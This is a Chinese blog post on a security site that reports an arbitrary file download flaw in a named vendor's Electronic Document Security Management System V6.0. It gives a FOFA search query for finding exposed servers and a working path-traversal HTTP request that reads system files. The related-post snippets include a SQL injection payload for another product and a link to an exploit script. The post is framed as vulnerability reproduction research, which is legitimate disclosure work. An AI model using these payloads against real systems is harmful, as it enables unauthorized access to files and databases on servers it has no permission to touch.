电子文档安全管理系统V6.0接口backup存在任意文件下载

原创 于 2025-05-26 16:50:54 发布 · 378 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全 #漏洞复现 #网络安全 #漏洞利用 #漏洞库 #渗透测试

免责声明

本文章仅做网络安全技术研究使用!严禁用于非法犯罪行为,请严格遵守国家法律法规;请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

问题描述

济南上邦电子科技有限公司电子文档安全管理系统 V6.0 resources/backup存在任意文件下载,攻击者可通过该问题获取服务器所有文件信息

fofa

body="docsafe/docsafe.nocache.js"

poc

GET /resources/backup//..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini HTTP/1.1
Host: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

                

        

    


  



    



                



	

		

			

				
					
15、服务管理器 2010 安装指南

				
			

			

				

					keras9composer的博客
				

				

					07-14
					
					32
					
				

			

		

		

			
				
本文详细介绍了 Microsoft System Center Service Manager 2010 的安装与配置指南,包括安装前的规划、组件安装顺序、安全账户设置、数据仓库管理服务器、自助服务门户及控制台的安装步骤。同时,还涵盖了安装过程中可能遇到的问题和解决方法,为系统管理员提供全面的部署支持。

			
		

	



                

            
              



	

		

			

				
					
JeeWMS cgFormBuildController.do SQL注入漏洞复现(CVE-2025-0391)

				
			

			

				

					0xSec
				

				

					02-06
					
					3172
					
				

			

		

		

			
				
JeeWMS cgFormBuildController.do 存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

			
		

	



              


  
              

                


	

		

			

				
					
百易云资产管理系统admin.ticket.close.php存在SQL注入

					
最新发布

				
			

			

				

					swordheart的博客
				

				

					05-23
					
					280
					
				

			

		

		

			
				
百易云资产管理系统在admin.ticket.close.php接口存在sql注入

			
		

	





	

		

			

				
					
禅道16.5 SQL注入(CNVD-2022-42853)

				
			

			

				

					qq_50854662的博客
				

				

					02-15
					
					1304
					
				

			

		

		

			
				
禅道16.5 SQL注入(CNVD-2022-42853)

			
		

	



		

			
		



	

		

			

				
					
sql注入合集_禅道sql注入

				
			

			

				

					2501_90424690的博客
				

				

					02-03
					
					468
					
				

			

		

		

			
				
用sqlmap跑一下。

			
		

	





	

		

			

				
					
禅道V16.5SQL注入漏洞(CNVD-2022-42853)

				
			

			

				

					RestoreJustice的博客
				

				

					03-23
					
					1090
					
				

			

		

		

			
				
禅道项目管理软件是一款国产的、基于LGPL协议、开源免费的项目管理软件,它集产品管理、项目管理、测试管理于一体,同时还包含了事务管理、组织管理等诸多功能,是中小型企业项目管理的首选,基于自主的PHP开发框架──ZenTaoPHP而成,第三方开发者或企业可非常方便的开发插件或者进行定制。在登录处未对用户输入的account参数内容作过滤校验,导致攻击者拼接恶意SQL语句执行,攻击者可利用漏洞获取数据库敏感信息。

			
		

	





	

		

			

				
					
【灾难恢复无压力:凝思安全操作系统V6.0.80备份与恢复计划】

				
			

			

				

					
				

			

		

		

			
				
[【灾难恢复无压力:凝思安全操作系统V6.0.80备份与恢复计划】](https://www.ubackup.com/screenshot/en/others/backup-types/full-backup.png)  参考资源链接:[凝思安全操作系统V6.0.80安装教程与常见问题详解]...

			
		

	





	

		

			

				
					
数据库之Redis运维手册(私人整理)

				
			

			

				

					企业实战系列集 ●●● https://ximenjianxue.blog.youkuaiyun.com
				

				

					11-20
					
					8033
					
				

			

		

		

			
				
1、redis配置文件
 #cat 8000.conf 

daemonize no
#[yes/no]默认值no,该参数用于定制redis服务是否以守护模式运行。

pidfile /var/run/redis.pid
#默认值/var/run/redis.pid,指定redis服务的进程号文件路径,以守护模式运行时需要配置本参数;  

port 8000
#默认值6379,指定redis服务...

			
		

	





	

		

			

				
					
嵌入式文件系统选型指南:LittleFS vs FATFS在Flash存储中的5大对比维度

				
			

			

				

					
				

			

		

		

			
				
![嵌入式系统入门项目实践推荐]...嵌入式文件系统应运而生,专为资源受限环境设计,在有限的RAM、ROM和低速Flash存储介质上实现高效、安全的数据组织与访问。  相较于通用操作系统中的文件系

			
		

	





	

		

			

				
					
如何在Linux系统部署OpenProp_v3.3.4?完整实战指南(含配置命令与避坑清单)

				
			

			

				

					
				

			

		

		

			
				
重点分析了操作系统兼容性、Python 依赖管理、数据库与中间件集成、网络策略配置等基础环境搭建要点,并详细说明了配置文件调优、服务初始化、反向代理与 HTTPS 实现等核心技术步骤。结合单机部署实例与安全加固方案...

			
		

	





	

		

			

				
					
金和OA 数据字典 c6

				
			

			

				

					09-06
				

			

		

		

			
				
金和OA系统,C6数据库-数据字典,分享以供大家参考,借鉴

			
		

	





	

		

			

				
					
金和OA C6/S-系统管理员手册.pdf

				
			

			

				

					07-31
				

			

		

		

			
				
详细介绍金和OA C6版系统管理使用手册

			
		

	





	

		

			

				
					
金和OA,C6配置手册

				
			

			

				

					08-31
				

			

		

		

			
				
金和办公OA系统,C6版本配置手册,一般你找不到哦。

			
		

	





	

		

			

				
					
瑞友天翼应用虚拟化系统GetPwdPolicy存在SQL注入漏洞

				
			

			

				

					缘梦未来的博客
				

				

					01-09
					
					328
					
				

			

		

		

			
				
瑞友天翼应用虚拟化系统是西安瑞友信息技术资讯有限公司研发的具有自主知识产权,基于服务器计算架构的应用虚拟化平台。 它将用户各种应用软件集中部署在瑞友天翼服务器(群)上,客户端通过WEB即可快速安全的访问经服务器上授权的应用软件,实现集中应用、远程接入、协同办公等,从而为用户打造集中、便捷、安全、高效的虚拟化支撑平台。

			
		

	





	

		

			

				
					
瑞友天翼应用虚拟化系统 GetPwdPolicy SQL注入漏洞

				
			

			

				

					2401_88792439的博客
				

				

					01-29
					
					374
					
				

			

		

		

			
				
CMD=GetPwdPolicy&User=1%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x7e%2C%28SELECT+user()%29%2C0x7e%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--+-exp一键验证脚本:www.gddertr.xyz/瑞友天翼应用虚拟化系统 GetPwdPolicy SQL注入漏洞.py。返回admin即可验证漏洞

			
		

	





	

		

			

				
					
漏洞复现--金和OA clobfield SQL注入

				
			

			

				

					qq_53003652的博客
				

				

					12-19
					
					1023
					
				

			

		

		

			
				
金和OA协同办公管理系统C6软件(简称金和OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。该产品存在SQL注入漏洞

			
		

	





	

		

			

				
					
漏洞复现】瑞友天翼应用虚拟化系统-SQL注入-ConsoleExternalApi.XGI

				
			

			

				

					知黑而守白
				

				

					06-19
					
					1455
					
				

			

		

		

			
				
瑞友天翼虚拟化系统是一种基于虚拟化技术的系统,旨在提高硬件资源利用率和灵活性,降低成本,提高效率,适用于各种规模的企业和组织。瑞友天翼虚拟化系统ConsoleExternalApi.XGI接口存在SQL注入漏洞,恶意攻击者可能会利用漏洞修改数据库中的数据,例如添加、删除或修改记录,导致数据损坏或丢失。

			
		

	





	

		

			

				
					
金和OA C6 HomeService.asmx SQL注入漏洞

				
			

			

				

					waxcj的博客
				

				

					01-09
					
					540
					
				

			

		

		

			
				
20240109

			
		

	





	

		

			

				
					

				
			

			

				

					
				

			

		

		

			
				

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

  

	
    

      

      

      

        
        

          
          

            

              成就一亿技术人!
            

            

              拼手气红包6.0元
            

          

        

        

          

            还能输入1000个字符
          

          

             
          

          

            

              红包
              添加红包
            

            

              表情包
              插入表情
              

                

              

            

            

              表情包
              代码片
              

                
              

            

            

              
              
              
              
              
              
              
            

          

        

      

    

		

			

			

			

					 条评论被折叠 查看
			

			

				
			

		

	

	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值